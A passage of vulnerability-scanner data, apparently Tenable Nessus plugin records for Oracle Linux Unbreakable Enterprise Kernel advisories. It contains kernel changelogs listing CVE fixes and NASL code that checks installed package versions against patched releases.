\"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-10318\", \"CVE-2016-1575\", \"CVE-2016-1576\", \"CVE-2016-6213\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-1000405\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12154\", \"CVE-2017-12190\", \"CVE-2017-12192\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-16527\", \"CVE-2017-16650\", \"CVE-2017-2618\", \"CVE-2017-2671\", \"CVE-2017-7477\", \"CVE-2017-7482\", \"CVE-2017-7533\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-7618\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8797\", \"CVE-2017-8831\", \"CVE-2017-8890\", \"CVE-2017-9059\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3659\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:44", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.298.1.el6uek]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 23320090]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 24337879]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang) [Orabug: 25102637]\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang) [Orabug: 25102637]\n- RDS: Print failed rdma op details if failure is remote access error \n(Rama Nichanamatlu) [Orabug: 25440316]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] \n{CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592013]\n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) \n[Orabug: 26650039]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797307]\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep \nGopanapalli) [Orabug: 24823234]\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 25671723]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 25671723]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. \nMiller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] \n{CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho \nChehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James \nSmart) [Orabug: 26765341]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3658.NASL", "href": "https://www.tenable.com/plugins/nessus/105145", "published": "2017-12-11T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3658) (BlueBorne) (Stack Clash)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3658.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105145);\n script_version(\"3.17\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2014-9710\", \"CVE-2015-1465\", \"CVE-2015-2686\", \"CVE-2015-4167\", \"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000253\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3658) (BlueBorne) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.298.1.el6uek]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 23320090]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 24337879]\n- xen-netfront: cast grant table reference first to type int (Dongli \nZhang) [Orabug: 25102637]\n- xen-netfront: do not cast grant table reference to signed short \n(Dongli Zhang) [Orabug: 25102637]\n- RDS: Print failed rdma op details if failure is remote access error \n(Rama Nichanamatlu) [Orabug: 25440316]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] \n{CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592013]\n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) \n[Orabug: 26650039]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797307]\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep \nGopanapalli) [Orabug: 24823234]\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 25671723]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 25671723]\n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) \n[Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. \nMiller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] \n{CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho \nChehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James \nSmart) [Orabug: 26765341]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: \n26643562] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina \nDubroca) [Orabug: 27011278] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) \n[Orabug: 27002453] {CVE-2017-1000111}\n- mlx4_core: calculate log_mtt based on total system memory (Wei Lin \nGuay) [Orabug: 26867355]\n- xen/x86: Add interface for querying amount of host memory (Boris \nOstrovsky) [Orabug: 26867355]\n- fs/binfmt_elf.c: fix bug in loading of PIE binaries (Michael Davidson) \n [Orabug: 26870958] {CVE-2017-1000253}\n- Bluetooth: Properly check L2CAP config option output buffer length \n(Ben Seri) [Orabug: 26796428] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645562] \n{CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: \n26638926] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session \nkeyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578202] {CVE-2017-9242}\n- selinux: quiet the filesystem labeling behavior message (Paul Moore) \n[Orabug: 25721485]\n- RDS/IB: active bonding port state fix for intfs added late (Mukesh \nKacker) [Orabug: 25875426]\n- HID: hid-cypress: validate length of report (Greg Kroah-Hartman) \n[Orabug: 25891914] {CVE-2017-7273}\n- udf: Remove repeated loads blocksize (Jan Kara) [Orabug: 25905722] \n{CVE-2015-4167}\n- udf: Check length of extended attributes and allocation descriptors \n(Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Verify i_size when loading inode (Jan Kara) [Orabug: 25905722] \n{CVE-2015-4167}\n- btrfs: drop unused parameter from btrfs_item_nr (Ross Kirk) [Orabug: \n25948102] {CVE-2014-9710}\n- Btrfs: cleanup of function where fixup_low_keys() is called (Tsutomu \nItoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of fixup_low_keys() (Tsutomu Itoh) \n[Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of btrfs_extend_item() (Tsutomu Itoh) \n[Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: add support for asserts (Josef Bacik) [Orabug: 25948102] \n{CVE-2014-9710}\n- Btrfs: make xattr replace operations atomic (Filipe Manana) [Orabug: \n25948102] {CVE-2014-9710}\n- net: validate the range we feed to iov_iter_init() in \nsys_sendto/sys_recvfrom (Al Viro) [Orabug: 25948149] {CVE-2015-2686}\n- xsigo: Compute node crash on FC failover (Joe Jin) [Orabug: 25965445]\n- PCI: Prevent VPD access for QLogic ISP2722 (Ethan Zhao) [Orabug: \n25975513]\n- PCI: Prevent VPD access for buggy devices (Babu Moger) [Orabug: \n25975513]\n- ipv4: try to cache dst_entries which would cause a redirect (Hannes \nFrederic Sowa) [Orabug: 26032377] {CVE-2015-1465}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: \n26326145] {CVE-2017-1000364}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) \n[Orabug: 26366024] {CVE-2017-7645}\n- dm mpath: allow ioctls to trigger pg init (Mikulas Patocka) [Orabug: \n25645229]\n- xen/manage: Always freeze/thaw processes when suspend/resuming (Ross \nLagerwall) [Orabug: 25795530]\n- lpfc cannot establish connection with targets that send PRLI under P2P \nmode (Joe Jin) [Orabug: 25955028]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-December/007409.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET packet_set_ring Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-9710\", \"CVE-2015-1465\", \"CVE-2015-2686\", \"CVE-2015-4167\", \"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-1000111\", \"CVE-2017-1000251\", \"CVE-2017-1000253\", \"CVE-2017-1000363\", \"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11176\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12190\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-7273\", \"CVE-2017-7308\", \"CVE-2017-7542\", \"CVE-2017-7645\", \"CVE-2017-7889\", \"CVE-2017-8831\", \"CVE-2017-9074\", \"CVE-2017-9075\", \"CVE-2017-9077\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3658\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.298.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.298.1.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:43", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.8.13-118.20.1.el7uek]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) \n[Orabug: 25392692]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) \n [Orabug: 26479780]\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric \nBiggers) [Orabug: 26592025]\n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) \n[Orabug: 26649818]\n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: \n26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468]\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] \n{CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly \nMayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] 